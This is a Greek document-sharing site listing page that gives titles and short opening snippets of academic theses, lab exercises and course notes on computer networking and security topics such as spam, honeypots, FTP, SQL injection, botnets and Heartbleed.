ΚΕΦΑΛΑΙΟ 7 ΠΟΛΕΜΩΝΤΑΣ ΤΟ SPAM ΚΕΦΑΛΑΙΟ 7 ΠΟΛΕΜΩΝΤΑΣ ΤΟ SPAM Λίγα λόγια για το spam Αμέτρητος είναι ο όγκος του spam email που καθημερινά γεμίζει τα mailboxes των χρηστών του internet. Το spam email είναι ίσως η μεγαλύτερη ενόχληση

Διαβάστε περισσότερα

δημιουργία ενός script για την αντιμετώπιση του sasser

δημιουργία ενός script για την αντιμετώπιση του sasser ΚΕΦΑΛΑΙΟ 6 ΔΗΜΙΟΥΡΓΙΑ ΕΝΟΣ SCRIPT ΓΙΑ ΤΗΝ ΑΝΤΙΜΕΤΩΠΙΣΗ ΤΟΥ SASSER Εισαγωγή Από το 1988 και το worm που έφτιαξε ο ερευνητής Robert Morris για να δει αν η εξάπλωση ενός ιου είναι εφικτή, κανείς δεν μπορούσε

Διαβάστε περισσότερα

ΚΕΦΑΛΑΙΟ 1 HONEYPOTS, HONEYNETS

ΚΕΦΑΛΑΙΟ 1 HONEYPOTS, HONEYNETS ΚΕΦΑΛΑΙΟ 1 HONEYPOTS, HONEYNETS Μόνο κάποιος που γνωρίζει τις μεθόδους των επιτιθέμενων μπορεί να προστατεύσει κατάλληλα τα συστήματα του... Εισαγωγή Τα υπολογιστικά συστήματα που είναι σήμερα συνδεδεμένα

Διαβάστε περισσότερα

ΤΕΧΝΙΚΕΣ ΕΠΙΘΕΣΗΣ (1/8)

ΤΕΧΝΙΚΕΣ ΕΠΙΘΕΣΗΣ (1/8) ΑΣΦΑΛΕΙΑ WEB CLIENT ΤΕΧΝΙΚΕΣ ΕΠΙΘΕΣΗΣ (1/8) Επίθεση άρνησης υπηρεσίας (Denial of Service-DoS). Αποστολή πολλών αιτήσεων στο µηχάνηµα-στόχο ώστε τα resources που του αποµένουν (σε αυτόν ή και στο δίκτυο).

Διαβάστε περισσότερα

Web and HTTP. Βασικά Συστατικά: Web Server Web Browser HTTP Protocol

Web and HTTP. Βασικά Συστατικά: Web Server Web Browser HTTP Protocol HTTP Protocol Web and HTTP Βασικά Συστατικά: Web Server Web Browser HTTP Protocol Web Servers (1/2) Ένα πρόγραμμα (λογισμικό) που έχει εγκατασταθεί σε ένα υπολογιστικό σύστημα (έναν ή περισσότερους υπολογιστές)

Διαβάστε περισσότερα

ΜΕΤΑΦΟΡΑ ΑΡΧΕΙΩΝ FTP

ΜΕΤΑΦΟΡΑ ΑΡΧΕΙΩΝ FTP ΜΕΤΑΦΟΡΑ ΑΡΧΕΙΩΝ FTP Το FTP (File Transfer Protocol) είναι το εξειδικευμένο πρωτόκολλο μεταφοράς αρχείων στα σύγχρονα δίκτυα δεδομένων όπως το Διαδίκτυο. Δίνει τη δυνατότητα μεταφοράς αρχείων από τον υπολογιστή

Διαβάστε περισσότερα

ΤΕΙ ΗΠΕΙΡΟΥ Τμήμα Τηλεπληροφορικής & Διοίκησης

ΤΕΙ ΗΠΕΙΡΟΥ Τμήμα Τηλεπληροφορικής & Διοίκησης ΤΕΙ ΗΠΕΙΡΟΥ Τμήμα Τηλεπληροφορικής & Διοίκησης ΕΓΚΑΤΑΣΤΑΣΗ & ΠΑΡΑΜΕΤΡΟΠΟΙΗΣΗ INTERNET INFORMATION SERVER (IIS) ΓΙΑ ΥΛΟΠΟΙΗΣΗ ΥΠΗΡΕΣΙΩΝ ΔΙΑΔΙΚΤΥΟΥ (WEB SERVICES) ΣΠΟΥΔΑΣΤΡΙΑ:Μπάρδα Μαρία ΕΙΣΗΓΗΤΗΣ: Τσιαντής

Διαβάστε περισσότερα

Πως μπορούν τα μέρη του υλικού ενός υπολογιστή να επικοινωνούν και να συνεργάζονται μεταξύ τους; Επειδή ακολουθούν συγκεκριμένες οδηγίες (εντολές).

Πως μπορούν τα μέρη του υλικού ενός υπολογιστή να επικοινωνούν και να συνεργάζονται μεταξύ τους; Επειδή ακολουθούν συγκεκριμένες οδηγίες (εντολές). Κεφάλαιο 5 Πως μπορούν τα μέρη του υλικού ενός υπολογιστή να επικοινωνούν και να συνεργάζονται μεταξύ τους; Επειδή ακολουθούν συγκεκριμένες οδηγίες (εντολές). Το σύνολο αυτών των εντολών το ονομάζουμε

Διαβάστε περισσότερα

PROXY SERVER. Άριστη πύλη διαχωρισμού μεταξύ του εσωτερικού δικτύου και του Internet.

PROXY SERVER. Άριστη πύλη διαχωρισμού μεταξύ του εσωτερικού δικτύου και του Internet. PROXY SERVER Άριστη πύλη διαχωρισμού μεταξύ του εσωτερικού δικτύου και του Internet. Αποτελεσματικό εργαλείο για την απόκρυψη των εσωτερικών λεπτομερειών και διευθύνσεων IP του δικτύου. Αυξάνει τη συνολική

Διαβάστε περισσότερα

FTP - (File Transfer Protocol ) Πρωτόκολλο Μεταφοράς Αρχείων

FTP - (File Transfer Protocol ) Πρωτόκολλο Μεταφοράς Αρχείων FTP - (File Transfer Protocol ) Πρωτόκολλο Μεταφοράς Αρχείων Το File Transfer Protocol (FTP), (Πρωτόκολλο Μεταφοράς Αρχείων) είναι ένα ευρέως χρησιμοποιούμενο πρωτόκολλο σε δίκτυα τα οποία υποστηρίζουν

Διαβάστε περισσότερα

Ασφάλεια Υπολογιστών Και Δικτύων. Προσομοίωση επίθεσης σε ευπαθές σε SQL Injection σύστημα και απόκτηση κονσόλας διαχειριστή

Ασφάλεια Υπολογιστών Και Δικτύων. Προσομοίωση επίθεσης σε ευπαθές σε SQL Injection σύστημα και απόκτηση κονσόλας διαχειριστή Ασφάλεια Υπολογιστών Και Δικτύων Προσομοίωση επίθεσης σε ευπαθές σε SQL Injection σύστημα και απόκτηση κονσόλας διαχειριστή Ονοματεπώνυμο: Κυριακού Ανδρόνικος Αριθμός Μητρώου: 5806 Email: kyriakou@ceid.upatras.gr

Διαβάστε περισσότερα

ΟΙΚΟΝΟΜΙΚΟ ΠΑΝΕΠΙΣΤΗΜΙΟ ΑΘΗΝΩΝ BOTNETS. Τεχνικές ανίχνευσης και απόκρυψης. Ασημάκης Σιδηρόπουλος. Επιβλέπων: Καθηγητής Γεώργιος Πολύζος

ΟΙΚΟΝΟΜΙΚΟ ΠΑΝΕΠΙΣΤΗΜΙΟ ΑΘΗΝΩΝ BOTNETS. Τεχνικές ανίχνευσης και απόκρυψης. Ασημάκης Σιδηρόπουλος. Επιβλέπων: Καθηγητής Γεώργιος Πολύζος ΟΙΚΟΝΟΜΙΚΟ ΠΑΝΕΠΙΣΤΗΜΙΟ ΑΘΗΝΩΝ ΠΡΟΓΡΑΜΜΑ ΜΕΤΑΠΤΥΧΙΑΚΩΝ ΣΠΟΥ ΩΝ ΣΤΗΝ ΕΠΙΣΤΗΜΗ ΤΩΝ ΥΠΟΛΟΓΙΣΤΩΝ ιπλωματική Εργασία Μεταπτυχιακού ιπλώματος Ειδίκευσης BOTNETS Τεχνικές ανίχνευσης και απόκρυψης Ασημάκης Σιδηρόπουλος

Διαβάστε περισσότερα

Κεφάλαιο 2. Πηγές δεδομένων του Honeynet

Κεφάλαιο 2. Πηγές δεδομένων του Honeynet Πηγές δεδομένων του Honeynet - Σελίδα 16 - Πηγές Δεδομένων του Honeynet Οι πηγές δεδομένων, είναι εξαρτήματα του μηχανισμού Data Capture που μας παρέχουν στοιχεία για κάθε γεγονός που διαδραματίζεται μέσα

Διαβάστε περισσότερα

ΚΕΦΑΛΑΙΟ 2 ΤΟ HONEYD. Εισαγωγή

ΚΕΦΑΛΑΙΟ 2 ΤΟ HONEYD. Εισαγωγή ΚΕΦΑΛΑΙΟ 2 ΤΟ HONEYD Εισαγωγή Τα τελευταία χρόνια ο όγκος της κακόβουλης διαδικτυακής κίνησης έχει αυξηθεί εντυπωσιακά, λόγω της συνεχούς εξάπλωσης των worms, τη δραστηριότητα των script kiddies που χρησιμοποιούν

Διαβάστε περισσότερα

Σενάριο Εστίασης Win XP:

Σενάριο Εστίασης Win XP: Σενάριο Εστίασης Win XP: Υλικό: 1 Η/Υ (backoffice), 1 POS, 1 router Motorola, 1 PDA. Σενάριο: Sync του backoffice με το POS και merge του POS με το PDA. Προϋποθέσεις Software: 1) BACK OFFICE : WIN XP pro,.net

Διαβάστε περισσότερα

α) η καταγραφή και η σύλληψη της δικτυακής κίνησης (capture) και β) η ανάλυση της δικτυακής κίνησης.

α) η καταγραφή και η σύλληψη της δικτυακής κίνησης (capture) και β) η ανάλυση της δικτυακής κίνησης. Εργαστηριακή Άσκηση 3 Σκοπός της τρίτης σειράς ασκήσεων είναι η γνωριµία µε τον αναλυτή πρωτοκόλλων Wireshark. Το πρόγραµµα Wireshark είναι ένας ανιχνευτής πακέτων (packet sniffer) και διατίθεται ως ανοιχτό

Διαβάστε περισσότερα

Λογισμικό για το Σχολικό εργαστήριο

Λογισμικό για το Σχολικό εργαστήριο Λογισμικό για το Σχολικό εργαστήριο Αντικείμενο: Λειτουργικά Συστήματα Λογισμικό συντήρησης και ασφάλειας Λογισμικό Εφαρμογών Λογισμικό για το Σχολικό Εργαστήριο Λειτουργικά Συστήματα Η κατάσταση σήμερα:

Διαβάστε περισσότερα

Εργαλεία ανάπτυξης εφαρμογών internet Ι

Εργαλεία ανάπτυξης εφαρμογών internet Ι IEK ΟΑΕΔ ΚΑΛΑΜΑΤΑΣ ΤΕΧΝΙΚΟΣ ΕΦΑΡΜΟΓΩΝ ΠΛΗΟΦΟΡΙΚΗΣ Εργαλεία ανάπτυξης εφαρμογών internet Ι Διδάσκουσα: Κανελλοπούλου Χριστίνα ΠΕ19 Πληροφορικής Εργαλεία και τεχνικές από την πλευρά του πελάτη Java Applet

Διαβάστε περισσότερα

SingularLogic Σεπτέμβριος 2014

SingularLogic Σεπτέμβριος 2014 LIVE UPDATE Έκδοση 5 SingularLogic Σεπτέμβριος 2014 SingularLogic Live Update (SLUC) Είναι μια ανεξάρτητη εφαρμογή που σας επιτρέπει με εύκολο τρόπο: Να ενημερώνεστε για τις τρέχουσες προσφορές της SingularLogic

Διαβάστε περισσότερα

Τ.Π.Ε. στον Τουρισμό. Τ.Ε.Ι. Ιονίων Νήσων Σχολή Διοίκησης και Οικονομίας - Λευκάδα

Τ.Π.Ε. στον Τουρισμό. Τ.Ε.Ι. Ιονίων Νήσων Σχολή Διοίκησης και Οικονομίας - Λευκάδα Τ.Π.Ε. στον Τουρισμό Τ.Ε.Ι. Ιονίων Νήσων Σχολή Διοίκησης και Οικονομίας - Λευκάδα Στέργιος Παλαμάς, 2015-2016 Μάθημα 2: Βασικές Αρχές Ασφάλειας Η/Υ Ασφάλεια Ηλεκτρονικού Υπολογιστή Ασφάλεια από Κακόβουλο

Διαβάστε περισσότερα

Τεχνικές αλλαγές στις εκδόσεις

Τεχνικές αλλαγές στις εκδόσεις Τεχνικές αλλαγές στις εκδόσεις SingularLogic Control 4 rel 3.05 SingularLogic Control 1, 2, 3 rel 3.05 SingularLogic Accountant rel 3.05 SingularLogic Λογιστικά rel 3.05 ή µεταγενέστερες εκδόσεις SingularLogic

Διαβάστε περισσότερα

ΑΣΦΑΛΕΙΑΣ ΣΕ INTERNET HOSTS

ΑΣΦΑΛΕΙΑΣ ΣΕ INTERNET HOSTS Τμήμα Πληροφορικής και Επικοινωνιών Α.Τ.Ε.Ι. Σερρών Σέρρες Μάρτιος 2006 ΜΕΛΕΤΗ ΕΠΙΣΦΑΛΩΝ ΣΗΜΕΙΩΝ ΚΑΙ ΒΕΛΤΙΩΣΗ ΤΗΣ ΑΣΦΑΛΕΙΑΣ ΣΕ INTERNET HOSTS Βροχίδης Ηλίας ΠΤΥΧΙΑΚΗ ΕΡΓΑΣΙΑ Επιβλέπων Καθηγητής: Χουβαρδάς

Διαβάστε περισσότερα

XAMPP Apache MySQL PHP javascript xampp

XAMPP Apache MySQL PHP javascript xampp XAMPP Το xampp είναι ένα δωρεάν πρόγραμμα με το οποίο μπορούμε να κάνουμε εγκατάσταση τον Apache, τη MySQL και την PHP. Apache. Ο Apache είναι ένας Web Server. Είναι δηλαδή πρόγραμμα το οποίο τρέχει μόνιμα

Διαβάστε περισσότερα

ΤΕΧΝΟΛΟΓΙΑ ΔΙΚΤΥΩΝ ΕΠΙΚΟΙΝΩΝΙΩΝ

ΤΕΧΝΟΛΟΓΙΑ ΔΙΚΤΥΩΝ ΕΠΙΚΟΙΝΩΝΙΩΝ Σε δίκτυο υπολογιστών εμπιστευτική πληροφορία μπορεί να υπάρχει αποθηκευμένη σε μέσα αποθήκευσης (σκληροί δίσκοι, μνήμες κ.λ.π.), ή να κυκλοφορεί μέσου του δικτύου με τη μορφή πακέτων. Η ύπαρξη πληροφοριών

Διαβάστε περισσότερα

Μεταφορά Αρχείων µε χρήση της Υπηρεσίας FTP σελ. 1

Μεταφορά Αρχείων µε χρήση της Υπηρεσίας FTP σελ. 1 Μεταφορά Αρχείων µε χρήση της Υπηρεσίας FTP Περιεχόµενα Τι είναι η υπηρεσία FTP;...2 FTP από τη γραµµή εντολών των Windows...2 Το πρόγραµµα WS-FTP...4 Μεταφορά Αρχείων µε χρήση της Υπηρεσίας FTP σελ. 1

Διαβάστε περισσότερα

ΔΙΑΧΕΙΡΙΣΗ ΔΙΚΤΥΩΝ Διαχείριση Ασφαλείας (ΙΙ) Πρωτόκολλα & Αρχιτεκτονικές Firewalls Anomaly & Intrusion Detection Systems (IDS)

ΔΙΑΧΕΙΡΙΣΗ ΔΙΚΤΥΩΝ Διαχείριση Ασφαλείας (ΙΙ) Πρωτόκολλα & Αρχιτεκτονικές  Firewalls Anomaly & Intrusion Detection Systems (IDS) ΔΙΑΧΕΙΡΙΣΗ ΔΙΚΤΥΩΝ Διαχείριση Ασφαλείας (ΙΙ) Πρωτόκολλα & Αρχιτεκτονικές email Firewalls Anomaly & Intrusion Detection Systems (IDS) Β. Μάγκλαρης maglaris@netmode.ntua.gr www.netmode.ntua.gr 30/11/2015

Διαβάστε περισσότερα

ιαχείριση Πληροφοριών στο ιαδίκτυο

ιαχείριση Πληροφοριών στο ιαδίκτυο ιαχείριση Πληροφοριών στο ιαδίκτυο Εργαστήριο (Φυλλάδιο 3) ΤΕΙ Καβάλας - Σχολή ιοίκησης & Οικονοµίας Τµήµα ιαχείρισης Πληροφοριών ιδάσκων: Μαρδύρης Βασίλειος, ιπλ. Ηλ. Μηχανικός & Μηχ. Υπολογιστών, MSc

Διαβάστε περισσότερα

Λογισμικό. Αντωνακάκης Αντώνιος Δήμος Ευάγγελος Χορόζογλου Γεώργιος

Λογισμικό. Αντωνακάκης Αντώνιος Δήμος Ευάγγελος Χορόζογλου Γεώργιος Λογισμικό Αντωνακάκης Αντώνιος Δήμος Ευάγγελος Χορόζογλου Γεώργιος Λογισμικό για το Σχολικό εργαστήριο Αντικείμενο: Λειτουργικά Συστήματα Λογισμικό συντήρησης και ασφάλειας Λογισμικό Εφαρμογών Λογισμικό

Διαβάστε περισσότερα

Εγχειρίδιο εγκατάστασης και βασικής παραμετροποίησης σεναρίου εστίασης

Εγχειρίδιο εγκατάστασης και βασικής παραμετροποίησης σεναρίου εστίασης Εγχειρίδιο εγκατάστασης και βασικής παραμετροποίησης σεναρίου εστίασης Σε αυτό το εγχειρίδιο θα καλύψουμε τη μεθοδολογία εγκατάστασης ενός σεναρίου εστίασης από την αρχή έως το σημείο των βασικών ρυθμίσεων

Διαβάστε περισσότερα

Εργαστήριο 4 Ασκήσεις: Διαχείριση Δικτύου (nmap, iptables) και Προχωρημένες Εντολές Unix (grep, ps, cut, find)

Εργαστήριο 4 Ασκήσεις: Διαχείριση Δικτύου (nmap, iptables) και Προχωρημένες Εντολές Unix (grep, ps, cut, find) Εργαστήριο 4 Ασκήσεις: Διαχείριση Δικτύου (nmap, iptables) και Προχωρημένες Εντολές Unix (grep, ps, cut, find) 1) Δώστε την εντολή που δείχνει τις ανοιχτές εισερχόμενες θύρες (ports) της μηχανής σας. Χρησιμοποιήστε

Διαβάστε περισσότερα

Εισαγωγή 6. Tα πολλά πρόσωπα των απειλών για το PC 8. Οι βασικές ρυθμίσεις ασφαλείας στα Windows 18. Προστασία από το Malware με το Avast Antivirus 34

Εισαγωγή 6. Tα πολλά πρόσωπα των απειλών για το PC 8. Οι βασικές ρυθμίσεις ασφαλείας στα Windows 18. Προστασία από το Malware με το Avast Antivirus 34 περιεχόμενα Εισαγωγή 6 Tα πολλά πρόσωπα των απειλών για το PC 8 Οι βασικές ρυθμίσεις ασφαλείας στα Windows 18 Προστασία από το Malware με το Avast Antivirus 34 Γονικός έλεγχος σε PC και tablet 44 Παρακολούθηση

Διαβάστε περισσότερα

Υλοποίηση Δικτυακών Υποδομών και Υπηρεσιών: Υπηρεσία Ηλεκτρονικού Ταχυδρομείου - SMTP

Υλοποίηση Δικτυακών Υποδομών και Υπηρεσιών: Υπηρεσία Ηλεκτρονικού Ταχυδρομείου - SMTP Υλοποίηση Δικτυακών Υποδομών και Υπηρεσιών: Υπηρεσία Ηλεκτρονικού Ταχυδρομείου - SMTP Δρ. Απόστολος Γκάμας Διδάσκων (407/80) gkamas@uop.gr Υλοποίηση Δικτυακών Υποδομών και Υπηρεσιών Διαφάνεια 1 1 Ηλεκτρονικό

Διαβάστε περισσότερα

Εργαστηά ριο Βαά σεων Δεδομεάνων

Εργαστηά ριο Βαά σεων Δεδομεάνων Εργαστηά ριο Βαά σεων Δεδομεάνων Εγκατάσταση και χρήση εργαλείων - FAQs 2012-11-20 Contents 1. Λογισμικό που χρειάζεστε... 2 2. WAMP server... 3 2.1 Ζητήματα στην εγκατάσταση... 3 2.2 Services του WampServer...

Διαβάστε περισσότερα

Εργαστήριο ικτύων Υπολογιστών 6η ιάλεξη: Ασφάλεια δικτύων

Εργαστήριο ικτύων Υπολογιστών 6η ιάλεξη: Ασφάλεια δικτύων Εργαστήριο ικτύων Υπολογιστών 6 η ιάλεξη: Ασφάλεια δικτύων Ασφάλεια ικτύων Μέθοδοι επίθεσης Denial-of-Service i (DoS) Μη εξουσιοδοτημένη πρόσβαση (Unauthorized access attacks) Password attacks, Trojan

Διαβάστε περισσότερα

Οι ιοί των υπολογιστών αποτελούν πλέον ένα διαδεδομένο, καθημερινό φαινόμενο. Η γρήγορη εξάπλωση των ιών τα τελευταία χρόνια οφείλονται στο διαδίκτυο

Οι ιοί των υπολογιστών αποτελούν πλέον ένα διαδεδομένο, καθημερινό φαινόμενο. Η γρήγορη εξάπλωση των ιών τα τελευταία χρόνια οφείλονται στο διαδίκτυο Οι ιοί των υπολογιστών αποτελούν πλέον ένα διαδεδομένο, καθημερινό φαινόμενο. Η γρήγορη εξάπλωση των ιών τα τελευταία χρόνια οφείλονται στο διαδίκτυο και ειδικότερα στο ηλεκτρονικό ταχυδρομείο, το οποίο

Διαβάστε περισσότερα

Για το μέρος αυτό της άσκησης θα υλοποιήσετε μια εφαρμογή κελύφους η οποία θα χρησιμοποιείται ως εξής:

Για το μέρος αυτό της άσκησης θα υλοποιήσετε μια εφαρμογή κελύφους η οποία θα χρησιμοποιείται ως εξής: Κ24: Προγραμματισμός Συστήματος 3η Εργασία, Εαρινό Εξάμηνο 2018 Προθεσμία Υποβολής: Tρίτη 5 Ιουνίου, 23:59 Εισαγωγή Στα πλαίσια αυτής της εργασίας θα υλοποιήσετε τρεις διαφορετικές, συνεργαζόμενες εφαρμογές:

Διαβάστε περισσότερα

ίκτυα - Internet Υπηρεσίες Internet O Παγκόσµιος Ιστός (World Wide Web) Ηλεκτρονική Αλληλογραφία (E-mail) Υπηρεσία FTP (File Transfer Protocol)

ίκτυα - Internet Υπηρεσίες Internet O Παγκόσµιος Ιστός (World Wide Web) Ηλεκτρονική Αλληλογραφία (E-mail) Υπηρεσία FTP (File Transfer Protocol) Ιόνιο Πανεπιστήµιο Τµήµα Αρχειονοµίας-Βιβλιοθηκονοµίας Κέρκυρα ίκτυα - Internet 2 Υπηρεσίες Internet O Παγκόσµιος Ιστός (World Wide Web) ΜηχανέςΑναζήτησηςστοWeb Ηλεκτρονική Αλληλογραφία (E-mail) Υπηρεσία

Διαβάστε περισσότερα

Αρχιτεκτονική του πληροφοριακού συστήµατος Cardisoft Γραµµατεία 2003 ιαχείριση Προσωπικού

Αρχιτεκτονική του πληροφοριακού συστήµατος Cardisoft Γραµµατεία 2003 ιαχείριση Προσωπικού Αρχιτεκτονική του πληροφοριακού συστήµατος Cardisoft Γραµµατεία 2003 ιαχείριση Προσωπικού Γενικά Η αρχιτεκτονική ανάπτυξης τους πληροφοριακού συστήµατος Γραµµατεία 2000 υποσύστηµα διαχείρισης προσωπικού

Διαβάστε περισσότερα

Ο ηλεκτρονικός υπολογιστής µπορεί να επεξεργάζεται δεδοµένα βάσει ενός συνόλου προκαθορισµένων οδηγιών Το κυριότερο πρόβληµα που αντιµετωπίζουν οι

Ο ηλεκτρονικός υπολογιστής µπορεί να επεξεργάζεται δεδοµένα βάσει ενός συνόλου προκαθορισµένων οδηγιών Το κυριότερο πρόβληµα που αντιµετωπίζουν οι ΑΣΦΑΛΕΙΑ ΗΛΕΚΤΡΟΝΙΚΩΝ ΥΠΟΛΟΓΙΣΤΩΝ Βελντέ ιονυσία Γκικάκη Λυδία Κληρονόµου Αναστασία Ο ηλεκτρονικός υπολογιστής µπορεί να επεξεργάζεται δεδοµένα βάσει ενός συνόλου προκαθορισµένων οδηγιών Το κυριότερο πρόβληµα

Διαβάστε περισσότερα

«ΠΡΟΓΡΑΜΜΑ ΑΝΑΠΤΥΞΗΣ ΤΗΣ ΒΙΟΜΗΧΑΝΙΚΗΣ ΕΡΕΥΝΑΣ ΚΑΙ ΤΕΧΝΟΛΟΓΙΑΣ ΣΕ ΝΕΕΣ ΕΠΙΧΕΙΡΗΣΕΙΣ (ΠΑΒΕΤ-ΝΕ-2004)»

«ΠΡΟΓΡΑΜΜΑ ΑΝΑΠΤΥΞΗΣ ΤΗΣ ΒΙΟΜΗΧΑΝΙΚΗΣ ΕΡΕΥΝΑΣ ΚΑΙ ΤΕΧΝΟΛΟΓΙΑΣ ΣΕ ΝΕΕΣ ΕΠΙΧΕΙΡΗΣΕΙΣ (ΠΑΒΕΤ-ΝΕ-2004)» «ΠΡΟΓΡΑΜΜΑ ΑΝΑΠΤΥΞΗΣ ΤΗΣ ΒΙΟΜΗΧΑΝΙΚΗΣ ΕΡΕΥΝΑΣ ΚΑΙ ΤΕΧΝΟΛΟΓΙΑΣ ΣΕ ΝΕΕΣ ΕΠΙΧΕΙΡΗΣΕΙΣ (ΠΑΒΕΤ-ΝΕ-2004)» ΕΣΤΙΑ: «Μία ολοκληρωµένη πλατφόρµα ελέγχου ασφάλειας υπολογιστών και παροχής προστασίας στο ιαδίκτυο»

Διαβάστε περισσότερα

Εργαστήριο 3. Εγκατάσταση LAMP Stack στο AWS

Εργαστήριο 3. Εγκατάσταση LAMP Stack στο AWS Εργαστήριο 3 Εγκατάσταση LAMP Stack στο AWS ΕΠΛ425 - Τεχνολογίες Διαδικτύου Χειμερινό Εξάμηνο 201 Τί είναι ένας LAMP Server; Αποτελεί ένα πρότυπο μοντέλο για Web Services. Το ακρώνυμο αντιστοιχεί μέ: Linux

Διαβάστε περισσότερα

ΑΝΩΤΑΤΟ ΤΕΧΝΟΛΟΓIΚΟ ΕΚΠΑΙΔΕΥΤΙΚΟ ΙΔΡΥΜΑ ΑΡΤΑΣ ΣΧΟΛΗ ΔΙΟΙΚΗΣΗΣ & ΟΙΚΟΝΟΜΙΑΣ ΤΜΗΜΑ:ΤΗΛΕΠΛΗΡΟΦΟΡΙΚΗΣ & ΔΙΟΙΚΗΣΗΣ

ΑΝΩΤΑΤΟ ΤΕΧΝΟΛΟΓIΚΟ ΕΚΠΑΙΔΕΥΤΙΚΟ ΙΔΡΥΜΑ ΑΡΤΑΣ ΣΧΟΛΗ ΔΙΟΙΚΗΣΗΣ & ΟΙΚΟΝΟΜΙΑΣ ΤΜΗΜΑ:ΤΗΛΕΠΛΗΡΟΦΟΡΙΚΗΣ & ΔΙΟΙΚΗΣΗΣ ΑΝΩΤΑΤΟ ΤΕΧΝΟΛΟΓIΚΟ ΕΚΠΑΙΔΕΥΤΙΚΟ ΙΔΡΥΜΑ ΑΡΤΑΣ ΣΧΟΛΗ ΔΙΟΙΚΗΣΗΣ & ΟΙΚΟΝΟΜΙΑΣ ΤΜΗΜΑ:ΤΗΛΕΠΛΗΡΟΦΟΡΙΚΗΣ & ΔΙΟΙΚΗΣΗΣ ΠΤΥΧΙΑΚΗ ΕΡΓΑΣΙΑ ΘΕΜΑ ΕΓΚΑΤΑΣΤΑΣΗ APACHE WEB SERVER ΣΕ WINDOWS XP ΣΠΟΥΔΑΣΤEΣ: ΕΙΣΗΓΗΤΗΣ: ΑΛΕΞΑΚΗΣ

Διαβάστε περισσότερα

Πανεπιστήμιο Ιωαννίνων

Πανεπιστήμιο Ιωαννίνων Πανεπιστήμιο Ιωαννίνων Απομακρυσμένη σύνδεση Βασίλης Τζιβάρας Διάρθρωση Εισαγωγή στην απομακρυσμένη σύνδεση Απομακρυσμένη μεταφορά αρχείων Απομακρυσμένη εκτέλεση εντολών Διαχείριση των quota Διάρθρωση

Διαβάστε περισσότερα

ΗY335: Δίκτυα Υπολογιστών Χειμερινό Εξάμηνο Τμήμα Επιστήμης Υπολογιστών Πανεπιστήμιο Κρήτης Διδάσκουσα: Μαρία Παπαδοπούλη

ΗY335: Δίκτυα Υπολογιστών Χειμερινό Εξάμηνο Τμήμα Επιστήμης Υπολογιστών Πανεπιστήμιο Κρήτης Διδάσκουσα: Μαρία Παπαδοπούλη ΗY335: Δίκτυα Υπολογιστών Χειμερινό Εξάμηνο 2012-2013 Τμήμα Επιστήμης Υπολογιστών Πανεπιστήμιο Κρήτης Διδάσκουσα: Μαρία Παπαδοπούλη Project 2012-2013 Υλοποίηση ενός chat server-client Παράδοση: 7/2/2013

Διαβάστε περισσότερα

Βασικές Υπηρεσίες Διαδικτύου. Επικοινωνίες Δεδομένων Μάθημα 2 ο

Βασικές Υπηρεσίες Διαδικτύου. Επικοινωνίες Δεδομένων Μάθημα 2 ο Βασικές Υπηρεσίες Διαδικτύου Επικοινωνίες Δεδομένων Μάθημα 2 ο Μεταφορά αρχείων (File Transfer Protocol, FTP) user at host FTP user interface FTP client local file system file transfer FTP server remote

Διαβάστε περισσότερα

XEROX - ΕΛΤΙΟ ΑΣΦΑΛΕΙΑΣ XRX05-004

XEROX - ΕΛΤΙΟ ΑΣΦΑΛΕΙΑΣ XRX05-004 XEROX - ΕΛΤΙΟ ΑΣΦΑΛΕΙΑΣ XRX05-004 Η ευπάθεια του διακοµιστή MicroServer της Xerox πιθανόν να µην επιτρέψει την πρόσβαση στην υπηρεσία. Το ακόλουθο λογισµικό και οι οδηγίες χρήστη παρέχονται για τα προϊόντα

Διαβάστε περισσότερα

Network Address Translation (NAT)

Network Address Translation (NAT) HY335Α Δίκτυα Υπολογιστών Xειμερινό Εξάμηνο 2016-2017 Πανεπιστήμιο Κρήτης, Τμήμα Επιστήμης Υπολογιστών Network Address Translation (NAT) Network Layer Private IP Addresses Πρόβλημα: o χώρος των ΙΡ διευθύνσεων

Διαβάστε περισσότερα

Γιώργος Σπηλιώτης IT Consultant

Γιώργος Σπηλιώτης IT Consultant Γιώργος Σπηλιώτης IT Consultant Έκτακτη Είδηση! HEARTBleed OpenSSL v.1.0.1 έως v.1.0.1f Apache & Nginx περίπου 60% των sites Ζητάμε echo 64bytes για Block 1 byte Λάθος κατά το implementation του echo Τι

Διαβάστε περισσότερα

Σύγχρονες Απειλές & Προστασία. Γιάννης Παυλίδης Presales & Tech Support Engineer

Σύγχρονες Απειλές & Προστασία. Γιάννης Παυλίδης Presales & Tech Support Engineer Σύγχρονες Απειλές & Προστασία Γιάννης Παυλίδης Presales & Tech Support Engineer Σύγχρονες απειλές PHISHING BYOD WINDIGO CLOUD STORAGE WIN XP EOL MOBILITY CRYPTOLOCKERS Windows XP - λήξη υποστήριξης Ransomware:

Διαβάστε περισσότερα

Με λίγα λόγια, το TCP/IP καθορίζει τον τρόπο που πακετάρονται και μεταφέρονται τα δεδομένα της σύνδεσής μας.

Με λίγα λόγια, το TCP/IP καθορίζει τον τρόπο που πακετάρονται και μεταφέρονται τα δεδομένα της σύνδεσής μας. Γρήγορο Ίντερνετ με Κατάλληλες Ρυθμίσεις TCP/IP Η ταχύτητά μας στο ίντερνετ εξαρτάται από πολλούς παράγοντες, όπου τον κεντρικό ρόλο παίζει η σύνδεσή μας. Πολλές φορές, όμως, η σύνδεσή μας μπορεί να περιορίζεται

Διαβάστε περισσότερα

Ασφάλεια Υπολογιστικών Συστηµάτων

Ασφάλεια Υπολογιστικών Συστηµάτων Βασικές έννοιες Γεγονός (event) σε ένα υπολογιστικό σύστηµα ή δίκτυο: οτιδήποτε µπορεί να συµβεί σε αυτό, π.χ. η είσοδος ενός χρήστη, η εκτέλεση ενός προγράµµατος, κλπ. ιαδικασίες παρακολούθησης δραστηριότητας

Διαβάστε περισσότερα

Βασικές Έννοιες Web Εφαρμογών

Βασικές Έννοιες Web Εφαρμογών ΟΙΚΟΝΟΜΙΚΟ ΠΑΝΕΠΙΣΤΗΜΙΟ ΑΘΗΝΩΝ ΤΜΗΜΑ ΔΙΟΙΚΗΤΙΚΗΣ ΕΠΙΣΤΗΜΗΣ ΚΑΙ ΤΕΧΝΟΛΟΓΙΑΣ Τεχνολογίες και Εφαρμογές Διαδικτύου Βασικές Έννοιες Web Εφαρμογών Κατερίνα Πραματάρη Τεχνολογίες και Εφαρμογές Διαδικτύου Περιεχόμενα

Διαβάστε περισσότερα

6.2 Υπηρεσίες Διαδικτύου

